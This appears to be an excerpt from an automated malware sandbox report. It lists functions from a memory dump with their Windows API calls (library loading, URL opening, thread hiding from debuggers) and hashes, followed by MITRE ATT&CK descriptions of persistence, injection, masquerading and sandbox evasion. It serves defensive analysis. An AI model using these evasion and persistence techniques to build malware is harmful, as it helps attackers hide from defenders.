Opcode ID: 73ab3eae31559a61b454fa0cf040b63b532e98b5d71c4f3da933079c017bf883
Instruction ID: b221f626305b2c68df3c9bdabb1f5440f78a330e17038affa0fd9c2ee56df9dc
Opcode Fuzzy Hash: 73ab3eae31559a61b454fa0cf040b63b532e98b5d71c4f3da933079c017bf883
Instruction Fuzzy Hash: 1C31A770744346ABEB314E20CD99BFE3AA5BF41740F108928ED4ADB591EB72CA44DA54

Uniqueness

Uniqueness Score: -1.00%

Function 00564B92, Relevance: 1.8, APIs: 1, Instructions: 299libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(00000000,00561BCE,00000000,?,?,00000014,?,?,00000014), ref: 00564BAE

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9ed2d87c379089fd0992d6a5476c882ee4426ec7d3fd1103cf371668072487e2
Instruction ID: c21d465fe4b8204c662a8845d88a4cfa0940161b5966d3d75b3281d9cd09a99d
Opcode Fuzzy Hash: 9ed2d87c379089fd0992d6a5476c882ee4426ec7d3fd1103cf371668072487e2
Instruction Fuzzy Hash: E7A1047034070AAFEB215F24CD96BEA3E62FF95340F204528FE459B2C1C7B998D4AB45

Uniqueness

Uniqueness Score: -1.00%

Function 00563276, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 7d49ac39df4df20022c09ec312664daffa8fd4d8b70d7a89fbd1924bba36884c
Instruction ID: 1937693d0eed10ed4092d0647adf29f8422949530923195a81015e50db1fbe60
Opcode Fuzzy Hash: 7d49ac39df4df20022c09ec312664daffa8fd4d8b70d7a89fbd1924bba36884c
Instruction Fuzzy Hash: B521A470344347ABEB314F20CD95BFE3BA5BF41740F144928ED4A9B591EB739A44E614

Uniqueness

Uniqueness Score: -1.00%

Function 005646B2, Relevance: 1.6, APIs: 1, Instructions: 77libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 64dd266a2a7b686a128d49afd2a0341a1bc1003988fad58b8ec3e5ceda0fb02d
Instruction ID: ad2d3e7fba2410d735e0f12dbdc76793fd2dfb8ca570b0c551228bb9bd4df27c
Opcode Fuzzy Hash: 64dd266a2a7b686a128d49afd2a0341a1bc1003988fad58b8ec3e5ceda0fb02d
Instruction Fuzzy Hash: 52112C44048295EBD72616604AA43FA5D86FFD3351F714E3AFD4393042E796C549AD42

Uniqueness

Uniqueness Score: -1.00%

Function 005646C8, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a4dd3d18d71ed3f9ab3f4f579a1973eb327441bc43836484259d7a5b66f2c6d4
Instruction ID: 1f4103a053d880cde233014437510e5a44da1309f8c5a53a2154d4247e5f69ab
Opcode Fuzzy Hash: a4dd3d18d71ed3f9ab3f4f579a1973eb327441bc43836484259d7a5b66f2c6d4
Instruction Fuzzy Hash: 0C114C441082D5E7D71517604AA43FA6D86FFD3310F718E39FD4393042D75AC58ABD42

Uniqueness

Uniqueness Score: -1.00%

Function 005646B0, Relevance: 1.6, APIs: 1, Instructions: 72libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 025d6abb291510b6bf5a970d0235192b90979e884b6b654ab3f5dc14e794ce8f
Instruction ID: 89a453bc3f053366546f4ac5c2193b4cbd1c5b239a3744a364a281321230fde2
Opcode Fuzzy Hash: 025d6abb291510b6bf5a970d0235192b90979e884b6b654ab3f5dc14e794ce8f
Instruction Fuzzy Hash: 4C1161441482D5EAE72516608FA43FE5D46FF93361F708F36FD4393042E79889897D42

Uniqueness

Uniqueness Score: -1.00%

Function 005646DE, Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4019558266799b9600045aa5efdcae198efa0ada91173540d8b405956c701843
Instruction ID: e27c7e7a38afb6f80b1329fd81a9470446c2e4c92d35da2758af89ca32556b40
Opcode Fuzzy Hash: 4019558266799b9600045aa5efdcae198efa0ada91173540d8b405956c701843
Instruction Fuzzy Hash: 60110C441482D5E6D7112B605AA43BE6D86FFD3360F714E39FD4393042D756C54A6D43

Uniqueness

Uniqueness Score: -1.00%

Function 005632B1, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 6d9b128ecc4fe287319ec3819996c3664a46e73f49658521815ae5e998df470e
Instruction ID: 9068e2370f58ec8a3f58e0ab607fa4e1c6b91f2183d5fcfb8aa4128a2e8f6a45
Opcode Fuzzy Hash: 6d9b128ecc4fe287319ec3819996c3664a46e73f49658521815ae5e998df470e
Instruction Fuzzy Hash: E021D230344387ABEB318E20CD94BFE3BA4BF01350F108A28AD46DB5D1EB72DA44E610

Uniqueness

Uniqueness Score: -1.00%

Function 0056331C, Relevance: 1.6, APIs: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 26f0ca9fee5709176d647a39d68bf5a032d8d727e55de788cdfa3edd13db6da2
Instruction ID: ffd1445d5967c732ef8b394f8e305311c1ce74a51fd7abd91247de5594c1c019
Opcode Fuzzy Hash: 26f0ca9fee5709176d647a39d68bf5a032d8d727e55de788cdfa3edd13db6da2
Instruction Fuzzy Hash: EF21C3702483869FEB324F20CD94BFA3FA5BF41340F144969ED469B592EB729A44E724

Uniqueness

Uniqueness Score: -1.00%

Function 00564714, Relevance: 1.6, APIs: 1, Instructions: 61libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 52983c01bb3c70ba8ecfb32802746e753e9ea18f4c8b71080e5a4ef818a7df59
Instruction ID: e898170995994decbeb4294a50506cb6beac4563265eba2110f74a83c84c0af0
Opcode Fuzzy Hash: 52983c01bb3c70ba8ecfb32802746e753e9ea18f4c8b71080e5a4ef818a7df59
Instruction Fuzzy Hash: 1E01F5441082C4E6D7162B7059A43BEAD42BFE3310F314E3AFC43A7152DB6AC58AAD43

Uniqueness

Uniqueness Score: -1.00%

Function 005632DB, Relevance: 1.6, APIs: 1, Instructions: 59networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563300

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: cb4298b4e4ee145ad481bec66373a608f9153a0c721f4c314576d7b579e6f320
Instruction ID: 6033364410be662fab446aab6616dc716a410299aa03e24497727a57f82a256f
Opcode Fuzzy Hash: cb4298b4e4ee145ad481bec66373a608f9153a0c721f4c314576d7b579e6f320
Instruction Fuzzy Hash: 71114270344347ABEB358F20CD94BFE3BA5BF40740F104928AD4A9B691EB739A45E654

Uniqueness

Uniqueness Score: -1.00%

Function 0056473E, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 22818ff99432bef970b010ee3af3487db8c8f24bf5981131bbf6854556531b06
Instruction ID: 0e814c36c4ca14f2710b9826012eb3cf4a829b305c1fc8ba88be9a3d902290e9
Opcode Fuzzy Hash: 22818ff99432bef970b010ee3af3487db8c8f24bf5981131bbf6854556531b06
Instruction Fuzzy Hash: BD01F7441082D5E7D6122B6159A43BEAD42BFD3710F704E3AEC8393152D756C589AD43

Uniqueness

Uniqueness Score: -1.00%

Function 00564794, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: aeb03eaf44b83877cac4e62e6f2ec79399e376c864ef41446c427cdcd69e4363
Instruction ID: 22502ec0ffd0eaa492743ede1e45e7834176a7d20718182f54f489fc8e3e39a5
Opcode Fuzzy Hash: aeb03eaf44b83877cac4e62e6f2ec79399e376c864ef41446c427cdcd69e4363
Instruction Fuzzy Hash: 5C012B441083D6E6D7222B7049587BEAD42BF93324F348B76FC53971D3DB65C5896D02

Uniqueness

Uniqueness Score: -1.00%

Function 0056051F, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c99d734edc1e6252f48bd6cb0f30469ad31b2cd7c84f1e43eddb7f291fe0a14
Instruction ID: cf18e86e4c0dd94fc3a666c225d036f0dc29bada76c3b77c7b1eb11b70f0df58
Opcode Fuzzy Hash: 3c99d734edc1e6252f48bd6cb0f30469ad31b2cd7c84f1e43eddb7f291fe0a14
Instruction Fuzzy Hash: D001F5714083426BC3529A3898593A72F92BFF7324F543A49D8A3871F1DB93C442CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00564760, Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2b31f081caee2c66cd16b4530a1282bfae3caaa39d83f1a37a86ffd6078e6d07
Instruction ID: 9aa9599849ad492a84f4c58f38e7bbbbbb9bd5ff03cf60c3e7b6f835488121f0
Opcode Fuzzy Hash: 2b31f081caee2c66cd16b4530a1282bfae3caaa39d83f1a37a86ffd6078e6d07
Instruction Fuzzy Hash: 6E012844108285E7D7162B7145A83BD6E42BFD6710F304A3AED4397152DB56C58AAE43

Uniqueness

Uniqueness Score: -1.00%

Function 005647D4, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 43189f3837d364140b8c00b1cc64edaaeac09bab313196adb08e245c7955b464
Instruction ID: c241ae4ba0c4f3629373e93b9e0bc1d2d1a10c81168af3394992b1687b58158d
Opcode Fuzzy Hash: 43189f3837d364140b8c00b1cc64edaaeac09bab313196adb08e245c7955b464
Instruction Fuzzy Hash: 06F0F60404C3D5ABC7126F7045683BEAE42BF97720F344B75ED9357093D766C949AE42

Uniqueness

Uniqueness Score: -1.00%

Function 00564779, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7332b77950d2551b9706b4fd89c7fd37ebe885fab40a2737eb85c663d88bfab7
Instruction ID: 24b81fa4b340f06f011c09169299cf83dedcf431f2f030d29b0397cb08350fbe
Opcode Fuzzy Hash: 7332b77950d2551b9706b4fd89c7fd37ebe885fab40a2737eb85c663d88bfab7
Instruction Fuzzy Hash: E7F04C001483C5D6C3126FB045983ADBE51BF93330F304B39EC92570D3D755C5496E42

Uniqueness

Uniqueness Score: -1.00%

Function 00564B90, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(00000000,00561BCE,00000000,?,?,00000014,?,?,00000014), ref: 00564BAE

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3ef16fbd573cc5f4d511d52118dcfd9f9fd9ab0057129120819c7e5ea636505e
Instruction ID: 7aa33a4c73684108c91c29f27fa055be467976c647aa913db54f138df974ab40
Opcode Fuzzy Hash: 3ef16fbd573cc5f4d511d52118dcfd9f9fd9ab0057129120819c7e5ea636505e
Instruction Fuzzy Hash: 0FF0F002008646EBCF022B749808BD66FA67F97334F180788ECA24A0F1C763C952EA06

Uniqueness

Uniqueness Score: -1.00%

Function 00560508, Relevance: 1.5, APIs: 1, Instructions: 37nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(0056057A,?,00000000,?,00563FAF,?), ref: 0056051A
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,00000000,00000000,00000000,00000000), ref: 0056068F

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: 3777f7046fb7e05cbfd8938e59cb592d5bb2e25020ede6cafdfb3618e6a0636a
Instruction ID: e149ff3a45e6b9cbd78a2d968a18dd220a17685923fa2e6c50e4de3f11d05e52
Opcode Fuzzy Hash: 3777f7046fb7e05cbfd8938e59cb592d5bb2e25020ede6cafdfb3618e6a0636a
Instruction Fuzzy Hash: CBF02B3110C3429ECB615B789C187A72F61BFE7330F342A46DCA3871F1DA5280819F02

Uniqueness

Uniqueness Score: -1.00%

Function 005647B0, Relevance: 1.5, APIs: 1, Instructions: 37libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c52f6d34aa86b47814b54d5e5f1529e66991f29d6f3b4ceca40c9674368fd5c4
Instruction ID: 4aa36980f511add800b3ef5fa4525cb950fa8615bfdac7658dae70a2693fec2d
Opcode Fuzzy Hash: c52f6d34aa86b47814b54d5e5f1529e66991f29d6f3b4ceca40c9674368fd5c4
Instruction Fuzzy Hash: E8F0E2041083D4A3D3136F7445683ADAE837FDA710F714A79A992A7062DBA7C549AF42

Uniqueness

Uniqueness Score: -1.00%

Function 005630C4, Relevance: 1.5, APIs: 1, Instructions: 26libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00561557,?,00000000,?,0000006C,00000333,?,00563AC1,?,?), ref: 00563896

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00552ee1f2363a7a2702b3575679cd5b9f5724544897fb565f4746279b5e7b38
Instruction ID: deb572f9a6807975d9e30eaffeb15d7c740f2c785aefa8fe39c0c60192c39280
Opcode Fuzzy Hash: 00552ee1f2363a7a2702b3575679cd5b9f5724544897fb565f4746279b5e7b38
Instruction Fuzzy Hash: 17F0A71110938656C352EB7405597967FA17ED2714F59C69DC8E1171B38B038386D7C6

Uniqueness

Uniqueness Score: -1.00%

Function 005647F1, Relevance: 1.5, APIs: 1, Instructions: 26libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bc79c2d2884b16b377957dac0f9e8f70160b3081f14c8706a84b5f5636cb9d46
Instruction ID: c7a450b294914d2ebc8bdbcfbe25a3a23879f2ee3c3782ebd6306315864fa8ce
Opcode Fuzzy Hash: bc79c2d2884b16b377957dac0f9e8f70160b3081f14c8706a84b5f5636cb9d46
Instruction Fuzzy Hash: F0E0E5101493D597C7025F640599359BE623F46320F214A799CA25B0A2D365C4049B41

Uniqueness

Uniqueness Score: -1.00%

Function 0056480F, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5fec8d800dad433ad9d5de4a69ee3ff3cdca8fb9c81faea5cb802ce2cb9858ad
Instruction ID: 0fb2f0c5aeeda2556f7133d00cdcad85c1798db87d5e55ee36afd430152c3b96
Opcode Fuzzy Hash: 5fec8d800dad433ad9d5de4a69ee3ff3cdca8fb9c81faea5cb802ce2cb9858ad
Instruction Fuzzy Hash: 56E0C20454829493C3136B74546C3EEAE923FD6B10F710A39EC5257022D3A3C508AB87

Uniqueness

Uniqueness Score: -1.00%

Function 0056483A, Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 834184558b10af734d210c6554a713b27b29ccde3323d836bdf20e1967c48b35
Instruction ID: 3a4b5942c68245317a6ad9b63aeab540113303c96aee736cda12e7186c515574
Opcode Fuzzy Hash: 834184558b10af734d210c6554a713b27b29ccde3323d836bdf20e1967c48b35
Instruction Fuzzy Hash: F2D02E0840028063C3033B3440AC3CEAA933FC6B10F620A7CE892AB033CBA3C10ECB81

Uniqueness

Uniqueness Score: -1.00%

Function 00564826, Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,005605C7,00000000,?,00563FAF,?), ref: 00564850

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da1444af0a0e4cb31055f0a1f395ff1554aae7929104cf55f09279609698fca9
Instruction ID: 59b44fbbacdd69a794a0028a0b1d0ef222f4ac1e8b4c58d72ff0366c2150646c
Opcode Fuzzy Hash: da1444af0a0e4cb31055f0a1f395ff1554aae7929104cf55f09279609698fca9
Instruction Fuzzy Hash: 3DD017446482A4A3C3023F7454683DEAE923FDAB10FA10A79E8A297022D797C509AA46

Uniqueness

Uniqueness Score: -1.00%

Function 00562E63, Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00562E0C,00562EA4,005606AB), ref: 00562E96

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1f9223e50ba9faf4a76e344332579708a4fb2b7253e93c40bcfa5676bb73c2fb
Instruction ID: f8689f62a7d6d14a4219f500cf287ee604d6a82badbaafa050eb692efbba9bab
Opcode Fuzzy Hash: 1f9223e50ba9faf4a76e344332579708a4fb2b7253e93c40bcfa5676bb73c2fb
Instruction Fuzzy Hash: A2D02234BE4305B3FB3045204D26FF2520AABD0F01F50820ABF8A290C0A7F24840C202

Uniqueness

Uniqueness Score: -1.00%

Function 00562E76, Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00562E0C,00562EA4,005606AB), ref: 00562E96

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5493485b07e94442d0667f433c44773a86b937e8985a9b905d587f7f821dc3c7
Instruction ID: e01e3f48dc8da8c91e1eac3d66a9d05c835116a166dc0d827a3d6c73afa0ca1e
Opcode Fuzzy Hash: 5493485b07e94442d0667f433c44773a86b937e8985a9b905d587f7f821dc3c7
Instruction Fuzzy Hash: 48D0A92486170473F7325A300C28FC661436FE0B00F42021DAF96680E286A38000C285

Uniqueness

Uniqueness Score: -1.00%

Function 005640C3, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,000000D0,00000200,005613FB,?,?,?,?,00563B09), ref: 005640D2

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 77a365bbbe1859b80ad08253b74c985d6b2fa531b8869268e6e281eb72e07f39
Instruction ID: d4bc8511ff630bf2799d68a0e90ef1ecef9fc3899a082dcd5043a0d4c37a713c
Opcode Fuzzy Hash: 77a365bbbe1859b80ad08253b74c985d6b2fa531b8869268e6e281eb72e07f39
Instruction Fuzzy Hash: C0C01275108305ABD294AB108C89E6A6A6CBBA5711F20C808B6868B0828A3098A0EA21

Uniqueness

Uniqueness Score: -1.00%

Function 00561F52, Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_000065AA,00000000,00000000,00000000), ref: 00561FE2

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: eb2230d2f86265b4ca9153f81bed1117e4339071010e99f06a75a7d1f4ff99bc
Instruction ID: b8b7bb7a11dd0c27f20db9ff058f1e6bffac11cbcbb8c712e08e600ca90aedef
Opcode Fuzzy Hash: eb2230d2f86265b4ca9153f81bed1117e4339071010e99f06a75a7d1f4ff99bc
Instruction Fuzzy Hash: 2711C670640B02BBF7256F348C5AFE96B62BF94B40F554418FA455F0F2D7A38885C617

Uniqueness

Uniqueness Score: -1.00%

Function 00561F96, Relevance: 1.3, APIs: 1, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_000065AA,00000000,00000000,00000000), ref: 00561FE2

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3647839e9d7c80c67193c9b5f840fa008fc2b7e06b60c1c447a236540eb05852
Instruction ID: 24ca33f1394085841f0c9214736eae9e537af53bfb169b2880bdf87c2d8b8ea4
Opcode Fuzzy Hash: 3647839e9d7c80c67193c9b5f840fa008fc2b7e06b60c1c447a236540eb05852
Instruction Fuzzy Hash: 3101F770504B41ABE315AF31885EBE97FA2BF94B11F05884CEA894B0B3D7628885CA13

Uniqueness

Uniqueness Score: -1.00%

Function 00561FC1, Relevance: 1.3, APIs: 1, Instructions: 34sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_000065AA,00000000,00000000,00000000), ref: 00561FE2

Memory Dump Source

Source File: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a06a30d641ec9373efc3050b2f2535ff34bb4a44c6242a53db730fc06dcc51b0
Instruction ID: e14adf019a0ef27595b3c2f9ad1f6eafca0fbbd82f01b31aac1e40b5b0820e56
Opcode Fuzzy Hash: a06a30d641ec9373efc3050b2f2535ff34bb4a44c6242a53db730fc06dcc51b0
Instruction Fuzzy Hash: BB01F430204B42DFD300AF34809EB857FA1BF45715F05858CD9991B0F3D762C446C613

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

